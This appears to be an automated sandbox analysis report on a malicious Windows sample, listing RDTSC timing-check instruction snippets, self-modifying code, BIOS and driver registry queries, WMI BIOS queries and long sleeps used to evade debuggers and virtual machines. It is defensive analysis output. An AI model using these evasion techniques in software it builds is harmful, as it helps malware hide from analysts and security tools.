              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51902C2 second address: 51902F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FAC2CCCA0DEh 0x00000013 xor si, C3B8h 0x00000018 jmp 00007FAC2CCCA0DBh 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51903BE second address: 51903EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, 00000000h 0x00000010 pushad 0x00000011 mov ecx, 20D3DC37h 0x00000016 popad 0x00000017 inc ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FAC2C5039B4h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51903EC second address: 519041D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 mov di, 4E70h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test al, al 0x0000000e pushad 0x0000000f mov bx, 7B88h 0x00000013 pushad 0x00000014 mov cx, dx 0x00000017 popad 0x00000018 popad 0x00000019 je 00007FAC2CCCA28Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FAC2CCCA0E0h 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519041D second address: 5190446 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea ecx, dword ptr [ebp-14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAC2C5039B5h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51904EC second address: 519052A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c mov ebx, 6EB84D6Eh 0x00000011 popad 0x00000012 jg 00007FAC9E498050h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FAC2CCCA0E0h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519052A second address: 5190530 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190530 second address: 5190590 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FAC2CCCA14Eh 0x00000011 pushad 0x00000012 mov al, 8Fh 0x00000014 pushfd 0x00000015 jmp 00007FAC2CCCA0E9h 0x0000001a and cx, FF06h 0x0000001f jmp 00007FAC2CCCA0E1h 0x00000024 popfd 0x00000025 popad 0x00000026 cmp dword ptr [ebp-14h], edi 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FAC2CCCA0DDh 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190590 second address: 51905AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FAC9DCD189Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51905AF second address: 51905B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51905B5 second address: 51905B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51905B9 second address: 51905CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51905CA second address: 51905D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51905D0 second address: 51905F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-2Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAC2CCCA0DAh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51905F1 second address: 51905F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51905F5 second address: 51905FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51905FB second address: 5190617 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bl, 0Ch 0x0000000f movzx eax, dx 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190617 second address: 5190673 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FAC2CCCA0E1h 0x00000011 add ax, EC96h 0x00000016 jmp 00007FAC2CCCA0E1h 0x0000001b popfd 0x0000001c pushad 0x0000001d mov di, cx 0x00000020 mov dl, cl 0x00000022 popad 0x00000023 popad 0x00000024 xchg eax, esi 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov ecx, 18C18ECDh 0x0000002d call 00007FAC2CCCA0DAh 0x00000032 pop eax 0x00000033 popad 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190673 second address: 519068E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519068E second address: 5190692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190692 second address: 5190698 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190698 second address: 519069E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519069E second address: 51906EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007FAC2C5039B7h 0x00000015 or al, 0000003Eh 0x00000018 jmp 00007FAC2C5039B9h 0x0000001d popfd 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51906EB second address: 519071C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FAC2CCCA0E0h 0x00000008 and si, 0638h 0x0000000d jmp 00007FAC2CCCA0DBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 movzx esi, bx 0x00000018 popad 0x00000019 nop 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519071C second address: 5190720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190720 second address: 5190726 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190726 second address: 519072C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519072C second address: 519073B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519073B second address: 519074A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519074A second address: 5190762 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAC2CCCA0E4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190762 second address: 5190766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190057 second address: 519005D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519005D second address: 5190061 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190061 second address: 5190088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAC2CCCA0E9h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190088 second address: 519009D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519009D second address: 51900CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FAC2CCCA0E6h 0x00000012 pop eax 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51900CE second address: 51900E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51900E9 second address: 51900ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51900ED second address: 51900F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190178 second address: 5190180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, di 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190180 second address: 5190186 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190186 second address: 519018A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519018A second address: 519018E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190C6F second address: 5190CE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FAC2CCCA0DEh 0x0000000f push eax 0x00000010 jmp 00007FAC2CCCA0DBh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FAC2CCCA0E6h 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e push esi 0x0000001f call 00007FAC2CCCA0DDh 0x00000024 pop ecx 0x00000025 pop edx 0x00000026 mov ebx, esi 0x00000028 popad 0x00000029 cmp dword ptr [769B459Ch], 05h 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 mov edi, 4351F7A8h 0x00000038 pushad 0x00000039 popad 0x0000003a popad 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190CE6 second address: 5190CFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAC2C5039B3h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190CFD second address: 5190D01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190D01 second address: 5190D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FAC9DCC169Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 movzx esi, bx 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190D18 second address: 5190D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAC2CCCA0E5h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190D7E second address: 5190D84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190D84 second address: 5190D88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190D88 second address: 5190D8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190D8C second address: 5190DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 4D23E3CEh 0x0000000d jmp 00007FAC2CCCA0DCh 0x00000012 xor dword ptr [esp], 3BB97FE6h 0x00000019 jmp 00007FAC2CCCA0E0h 0x0000001e call 00007FAC9E48EE8Ch 0x00000023 push 76952B70h 0x00000028 push dword ptr fs:[00000000h] 0x0000002f mov eax, dword ptr [esp+10h] 0x00000033 mov dword ptr [esp+10h], ebp 0x00000037 lea ebp, dword ptr [esp+10h] 0x0000003b sub esp, eax 0x0000003d push ebx 0x0000003e push esi 0x0000003f push edi 0x00000040 mov eax, dword ptr [769B4538h] 0x00000045 xor dword ptr [ebp-04h], eax 0x00000048 xor eax, ebp 0x0000004a push eax 0x0000004b mov dword ptr [ebp-18h], esp 0x0000004e push dword ptr [ebp-08h] 0x00000051 mov eax, dword ptr [ebp-04h] 0x00000054 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000005b mov dword ptr [ebp-08h], eax 0x0000005e lea eax, dword ptr [ebp-10h] 0x00000061 mov dword ptr fs:[00000000h], eax 0x00000067 ret 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007FAC2CCCA0E7h 0x0000006f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190DDA second address: 5190DF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 mov ecx, edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, 00000000h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov edi, 1A7AE68Ah 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190DF5 second address: 5190E0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 mov si, 28CFh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [ebp-1Ch], esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190E0A second address: 5190E21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190E21 second address: 5190E29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190E54 second address: 5190E9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, 90h 0x00000005 mov cl, 7Ch 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FAC9DCB74CDh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007FAC2C5039B3h 0x00000019 or ecx, 2CBAB5FEh 0x0000001f jmp 00007FAC2C5039B9h 0x00000024 popfd 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190E9B second address: 5190EF7 instructions: 0x00000000 rdtsc 0x00000002 mov ah, BAh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushfd 0x00000008 jmp 00007FAC2CCCA0E8h 0x0000000d jmp 00007FAC2CCCA0E5h 0x00000012 popfd 0x00000013 pop esi 0x00000014 popad 0x00000015 cmp dword ptr [ebp+08h], 00002000h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FAC2CCCA0E9h 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190EF7 second address: 5190EFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190EFB second address: 5190F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A07ED second address: 51A07F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A07F2 second address: 51A081C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FAC2CCCA0DCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A081C second address: 51A0821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0821 second address: 51A0865 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAC2CCCA0E7h 0x00000009 adc cx, 987Eh 0x0000000e jmp 00007FAC2CCCA0E9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0865 second address: 51A0869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0869 second address: 51A086F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A086F second address: 51A0875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0875 second address: 51A0879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0879 second address: 51A0912 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b jmp 00007FAC2C5039B2h 0x00000010 pushfd 0x00000011 jmp 00007FAC2C5039B2h 0x00000016 or ah, 00000008h 0x00000019 jmp 00007FAC2C5039ABh 0x0000001e popfd 0x0000001f popad 0x00000020 xchg eax, esi 0x00000021 pushad 0x00000022 pushad 0x00000023 mov ecx, ebx 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 popad 0x00000029 push eax 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FAC2C5039B5h 0x00000031 sub si, DED6h 0x00000036 jmp 00007FAC2C5039B1h 0x0000003b popfd 0x0000003c popad 0x0000003d xchg eax, esi 0x0000003e jmp 00007FAC2C5039AEh 0x00000043 mov esi, dword ptr [ebp+0Ch] 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007FAC2C5039AAh 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0912 second address: 51A0918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0918 second address: 51A091E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A091E second address: 51A0922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0922 second address: 51A0981 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b mov ecx, 766988B1h 0x00000010 pushfd 0x00000011 jmp 00007FAC2C5039AEh 0x00000016 jmp 00007FAC2C5039B5h 0x0000001b popfd 0x0000001c popad 0x0000001d je 00007FAC9DCB1405h 0x00000023 jmp 00007FAC2C5039AEh 0x00000028 cmp dword ptr [769B459Ch], 05h 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FAC2C5039AAh 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0981 second address: 51A0990 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0990 second address: 51A0A2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FAC9DCC9490h 0x0000000f pushad 0x00000010 call 00007FAC2C5039ACh 0x00000015 pushad 0x00000016 popad 0x00000017 pop eax 0x00000018 pushfd 0x00000019 jmp 00007FAC2C5039B1h 0x0000001e adc si, 7716h 0x00000023 jmp 00007FAC2C5039B1h 0x00000028 popfd 0x00000029 popad 0x0000002a xchg eax, esi 0x0000002b pushad 0x0000002c mov ebx, eax 0x0000002e mov ebx, ecx 0x00000030 popad 0x00000031 push eax 0x00000032 pushad 0x00000033 mov dx, 3876h 0x00000037 popad 0x00000038 xchg eax, esi 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c mov ebx, 3E69CA68h 0x00000041 pushfd 0x00000042 jmp 00007FAC2C5039B1h 0x00000047 sub eax, 32B229D6h 0x0000004d jmp 00007FAC2C5039B1h 0x00000052 popfd 0x00000053 popad 0x00000054 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0A2F second address: 51A0A35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0B49 second address: 51A0B50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D1D188 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 4932Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 7004Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\CEFJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\.ms-adJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\3D ObjectsJump to behavior
